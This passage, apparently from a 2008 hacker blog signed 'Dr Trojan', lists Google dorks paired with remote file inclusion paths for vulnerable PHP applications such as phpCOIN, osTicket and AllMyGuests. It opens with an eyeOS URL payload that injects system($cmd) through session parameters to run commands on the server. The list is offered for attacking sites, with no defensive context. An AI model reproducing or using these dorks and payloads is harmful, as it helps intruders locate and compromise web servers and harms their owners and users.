/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : “powered by Fantastic News v2.1.2?
/archive.php?CONFIG[script_path]=

26. keyword: “powered by smartblog” AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:”Powered By FusionPHP”
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : “Powered by iUser”
/common.php?include_path=

32. allinurl: “static.php?load=”
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:”/lire.php?rub=”

inurl:”/os/pointer.php?url=”

inurl:”folder.php?id=”

inurl:”show.php?page=”

inurl:”index2.php?DoAction=”

inurl:”index.php?canal=”

inurl:”index.php?screen=”

inurl:”index.php?langc=”

inurl:”index.php?Language=”

inurl:”view.php?page=”

dork: “powered by doodle cart”
rfi of this dork: enc/content.php?Home_Path=

dork: “Login to Calendar”
rfi of this dork: /embed/day.php?path=

dork: “powered by EQdkp”
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:”template.php?goto=”

inurl:”video.php?content=”

inurl:”pages.php?page=”

inurl:”index1.php?choix=”

inurl:”index1.php?menu=”

inurl:”index2.php?ascii_seite=”

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:”index.php?body=”

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: “Powered By ScozNews”
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:”kb_constants.php?module_root_path=”

dork: allinurl:”mcf.php”
rfi to this dork: /mcf.php?content=

dork: inurl:”main.php?sayfa=”
rfi to this dork: /main.php?sayfa=

dork: “MobilePublisherPHP”
rfi to this dork: /header.php?abspath=

dork: “powered by phpCOIN 1.2.3?
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:”index.php?go=”

inurl:”index1.php?=”

inurl:”lib/gore.php?libpath=”

inurl:”index2.php?p=”

Flags Counter

free counters

Background Mp3 Player

About Me

My Photo
Dr Trojan
Find Me On GooGle,Search UrduHack.
View my complete profile

Root@Paki -- Dr Trojan-H4x0rL1f3 -- © 2008 Template by Dicas Blogger.

TOPO